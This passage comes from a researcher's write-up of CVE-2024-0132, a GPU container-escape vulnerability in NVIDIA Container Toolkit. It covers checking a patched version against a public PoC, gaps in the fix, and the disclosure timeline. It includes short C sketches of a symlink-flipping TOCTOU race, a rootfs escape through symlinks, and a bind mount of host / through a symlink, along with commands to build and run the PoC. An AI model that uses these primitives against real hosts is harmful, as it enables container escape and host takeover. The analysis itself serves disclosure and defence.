    libnvidia-container-tools=1.16.2-1 \
    nvidia-container-toolkit-base=1.16.2-1 \
    nvidia-container-toolkit=1.16.2-1

Configure the nvidia container runtime:

root@wanglei-gpu:~# nvidia-ctk runtime configure --runtime=docker
INFO[0000] Config file does not exist; using empty config 
INFO[0000] Wrote updated config to /etc/docker/daemon.json 
INFO[0000] It is recommended that docker daemon be restarted. 
root@wanglei-gpu:~# systemctl restart docker

The environment information is as follows:

root@wanglei-gpu:~# nvidia-container-cli --version
cli-version: 1.16.2
lib-version: 1.16.2
build date: 2024-09-24T20:48+00:00
build revision: 921e2f3197385173cf8670342e96e98afe9b3dd3
build compiler: x86_64-linux-gnu-gcc-7 7.5.0
build platform: x86_64
build flags: -D_GNU_SOURCE -D_FORTIFY_SOURCE=2 -DNDEBUG -std=gnu11 -O2 -g -fdata-sections -ffunction-sections -fplan9-extensions -fstack-protector -fno-strict-aliasing -fvisibility=hidden -Wall -Wextra -Wcast-align -Wpointer-arith -Wmissing-prototypes -Wnonnull -Wwrite-strings -Wlogical-op -Wformat=2 -Wmissing-format-attribute -Winit-self -Wshadow -Wstrict-prototypes -Wunreachable-code -Wconversion -Wsign-conversion -Wno-unknown-warning-option -Wno-format-extra-args -Wno-gnu-alignof-expression -Wl,-zrelro -Wl,-znow -Wl,-zdefs -Wl,--gc-sections
root@wanglei-gpu:~#
root@wanglei-gpu:~# nvidia-container-cli info
NVRM version:   470.223.02
CUDA version:   11.4

Device Index:   0
Device Minor:   0
Model:          Tesla T4
Brand:          Nvidia
GPU UUID:       GPU-86fd03a3-2937-0c87-3dff-26be693ec102
Bus Location:   00000000:00:0d.0
Architecture:   7.5
root@wanglei-gpu:~#
root@wanglei-gpu:~# docker info
Client:
 Version:    24.0.7
 Context:    default
 Debug Mode: false

Server:
 Containers: 0
  Running: 0
  Paused: 0
  Stopped: 0
 Images: 0
 Server Version: 24.0.7
 Storage Driver: overlay2
  Backing Filesystem: extfs
  Supports d_type: true
  Using metacopy: false
  Native Overlay Diff: true
  userxattr: false
 Logging Driver: json-file
 Cgroup Driver: systemd
 Cgroup Version: 2
 Plugins:
  Volume: local
  Network: bridge host ipvlan macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
 Swarm: inactive
 Runtimes: io.containerd.runc.v2 nvidia runc
 Default Runtime: runc
 Init Binary: docker-init
 containerd version: 
 runc version: 
 init version: 
 Security Options:
  apparmor
  seccomp
   Profile: builtin
  cgroupns
 Kernel Version: 5.15.0-76-generic
 Operating System: Ubuntu 22.04.2 LTS
 OSType: linux
 Architecture: x86_64
 CPUs: 8
 Total Memory: 31.15GiB
 Name: wanglei-gpu
 ID: 611fe373-3040-4a95-96bc-cff83017766f
 Docker Root Dir: /var/lib/docker
 Debug Mode: false
 Experimental: false
 Insecure Registries:
  127.0.0.0/8
 Live Restore Enabled: false

2.2 Verification Result

Whether using the pre-built PoC image ssst0n3/poc-cve-2024-0132 or building it on the spot, the same PoC can no longer be exploited:

root@wanglei-gpu:~# git clone https://github.com/ssst0n3/poc-cve-2024-0132.git
root@wanglei-gpu:~# cd poc-cve-2024-0132/
root@wanglei-gpu:~/poc-cve-2024-0132# docker build -t ssst0n3/poc-cve-2024-0132 .
root@wanglei-gpu:~/poc-cve-2024-0132# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: error running hook #0: error running hook: exit status 1, stdout: , stderr: Auto-detected mode as 'legacy'
nvidia-container-cli: mount error: unexpected source file mode 120777 for /proc/1/cwd/usr/lib/libnvidia-ml.so.1: unknown.
ERRO[0000] error waiting for container:

4. Limitations of the Current Fix

4.1 file_mode_nofollow: Race Condition

file_mode_nofollow handles the symlink case, but it can be bypassed through a shared volume and a symlink race: the check and the bind mount are not atomic, so the path can be switched from a regular file to a symlink in between (a classic TOCTOU).

static char **
mount_files(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir, char *paths[], size_t size)
{
  ...
  for (size_t i = 0; i < size; ++i) {
          file = basename(paths[i]);
          if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags))
                  continue;
          if (path_append(err, src, paths[i]) < 0)
                  goto fail;
          if (file_mode_nofollow(err, src, &mode) < 0)
                  goto fail;
          // If we encounter resolved directories or symlinks here, we raise an error.
          if (S_ISDIR(mode) || S_ISLNK(mode)) {
                  error_setx(err, "unexpected source file mode %o for %s", mode, paths[i]);
                  goto fail;
          }
          if (path_append(err, dst, file) < 0)
                  goto fail;
          if ((*ptr++ = mount_in_root(err, src, cnt->cfg.rootfs, dst, cnt->uid, cnt->gid, MS_RDONLY|MS_NODEV|MS_NOSUID)) == NULL)
                  goto fail;
          *src_end = '\0';
          *dst_end = '\0';
  }
  ...
}
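
A sketch of the race (my illustration only; the name libfoo.so is hypothetical): an attacker inside the container, or anything with write access to a volume shared with the mounted path, keeps flipping the same path between a regular file and a symlink. If a flip lands in the window between file_mode_nofollow() and the bind mount, the kernel resolves the symlink while performing the mount, even though the check saw a regular file.

/* Hypothetical attacker loop for the TOCTOU window; illustration only.
 * Run in the directory the library is mounted from while the container
 * is started repeatedly.  Phase 1 makes the lstat-based check pass;
 * phase 2 makes a mount issued in the window follow the symlink. */
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
        for (;;) {
                unlink("libfoo.so");
                close(open("libfoo.so", O_CREAT | O_WRONLY, 0644)); /* regular file */
                unlink("libfoo.so");
                symlink("/", "libfoo.so");                          /* symlink to / */
        }
}

The window is small, so winning the race typically takes many container starts; a more robust fix would operate on a file descriptor (for example, open the source with O_PATH | O_NOFOLLOW and mount via /proc/self/fd/N) instead of re-resolving the path by name.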

4.2 mount_in_root

mount_in_root is supposed to return an error when the destination path resolves outside the rootfs, but in practice the error only fires when the path contains .. components; when path components can be symlinks it appears to provide little protection.

// mount_in_root bind mounts the specified src to the specified location in a root.
// If the destination resolves outside of the root an error is raised.
static char *
mount_in_root(struct error *err, const char *src, const char *rootfs, const char *path, uid_t uid, gid_t gid, unsigned long mountflags)
{
       char dst[PATH_MAX];
       if (path_resolve_full(err, dst, rootfs, path) < 0)
               return (NULL);
       return mount_with_flags(err, src, dst, uid, gid, mountflags);
}
int
path_resolve_full(struct error *err, char *buf, const char *root, const char *path)
{
        return (do_path_resolve(err, true, buf, root, path));
}

static int
do_path_resolve(struct error *err, bool full, char *buf, const char *root, const char *path)
{
 ...
        while ((file = strsep(&ptr, "/")) != NULL) {
                if (*file == '\0' || str_equal(file, "."))
                        continue;
                else if (str_equal(file, "..")) {
                        /*
                         * Remove the last component from the resolved path. If we are not below
                         * non-existent components, restore the previous file descriptor as well.
                         */

                        if ((p = strrchr(realpath, '/')) == NULL) {
                                error_setx(err, "path error: %s resolves outside of %s", path, root);
                                goto fail;
                        }
                        *p = '\0';
                        if (noents > 0)
                                --noents;
                        else {
                                if ((fd = open_next(err, fd, "..")) < 0)
                                        goto fail;
                        }
                } else {
                        ...
                }
        }

        if (!full) {
                if (path_new(err, buf, realpath) < 0)
                        goto fail;
        } else {
                if (path_join(err, buf, root, realpath) < 0)
                        goto fail;
        }
        rv = 0;

 fail:
        xclose(fd);
        return (rv);
}
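
The underlying issue is that a path can resolve outside a directory tree through a symlinked component without ever containing .., so a check keyed on .. never fires. A minimal demonstration of that general fact (my sketch, independent of the code above):

/* Sketch: escaping a "rootfs" without any ".." component.  The
 * symlinked directory resolves to /, so the final path lands outside
 * the tree even though the textual path never goes upward. */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
        char resolved[PATH_MAX];

        mkdir("rootfs", 0755);
        symlink("/", "rootfs/escape");
        if (realpath("rootfs/escape/etc", resolved) != NULL)
                printf("rootfs/escape/etc -> %s\n", resolved);  /* prints /etc */
        return 0;
}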

5. Did the Fix Introduce New Vulnerabilities?

No new vulnerabilities were introduced.

十、Vulnerability Discovery Method and Process

1. The Original Authors' Discovery Approach

The authors' approach was presumably as follows:

  1. Given a new container runtime, look first at its mount(2) call sites.
  2. Through code audit, find the CUDA forward-compatibility feature, which mounts from a container path to a container path, and container paths are easily attacker-controlled.
  3. Try a symlink attack (a sketch of the underlying primitive follows this list).
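
The primitive behind step 3 is that mount(2) resolves symlinks in its source argument. A hedged, root-only sketch of that primitive (my illustration, not the actual PoC, which lives in the repository linked earlier; run it only in a disposable VM):

/* Illustration of the attack primitive (not the actual PoC): the
 * kernel follows symlinks in the mount source, so a bind mount from
 * an attacker-controlled symlink mounts whatever the link points to. */
#include <stdio.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
        mkdir("target", 0755);
        symlink("/", "evil-src");        /* "source" controlled by the attacker */
        if (mount("evil-src", "target", NULL, MS_BIND, NULL) < 0) {
                perror("mount");
                return 1;
        }
        puts("host / is now bind mounted at ./target");
        return 0;
}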

2. Could It Have Been Discovered Before the Authors or the Industry?

Possibly:

  1. I independently reproduced the vulnerability while no public details were available, demonstrating the required capability.
  2. In early 2024 I had planned a vulnerability research project against nvidia-container-runtime, but it had low priority and the work had not actually started.

十一、Approaches for Finding Similar Issues

Discovery method            Applicable
Design-level analysis       ✔️
Security-model analysis     ✔️
Fuzzing
CodeQL

十二、Vulnerability Intelligence

1. How the Intelligence on This Vulnerability Was Obtained

On September 30, 2024, I learned of the vulnerability through a vulnerability intelligence platform.

2. Could the Vulnerability Have Been Sensed Before the Industry?

The fixer, elezar, submitted PR libnvidia-container#282 from his personal public repository to the main repository on September 11, 2024.

The vulnerability could therefore have been sensed ahead of public disclosure by monitoring his commit activity.

十三、Summary

The Wiz security research team has recently been focusing on AI security. CVE-2024-0132, the first GPU container-escape vulnerability, is an important piece of AI infrastructure security.

The root cause of this vulnerability is simple and it was relatively easy to discover, but nvidia-container-toolkit, as a third-party container component, historically drew little attention from researchers; only the recent AI boom brought it into focus.

During this research, I found the component's overall code quality to be low and NVIDIA's investment in the project limited. The component's remaining risks deserve further study.

Timeline

  • 2018-09-14: the developer introduced the vulnerability
  • 2024-09-01: Wiz reported the vulnerability to NVIDIA PSIRT
  • 2024-09-03: NVIDIA confirmed the vulnerability
  • 2024-09-26: NVIDIA released the fixed version
  • 2024-09-30: vulnerability intelligence collected; analysis and incident response began
  • 2024-10-14: with Wiz's details still undisclosed, I completed the industry's first reproduction
  • 2025-01-06: this article was completed
  • 2025-02-13: I published this article on my WeChat public account

References

  • https://www.wiz.io/blog/wiz-research-critical-nvidia-ai-vulnerability
  • https://nvidia.custhelp.com/app/answers/detail/a_id/5582

This article uses "漏洞研究: 漏洞分析与复现" (https://github.com/ssst0n3/security-research-specification) as its documentation baseline.


Originally published on the WeChat public account 石头的安全料理屋: 首个GPU容器逃逸: NVIDIA Container Toolkit CVE-2024-0132 漏洞分析
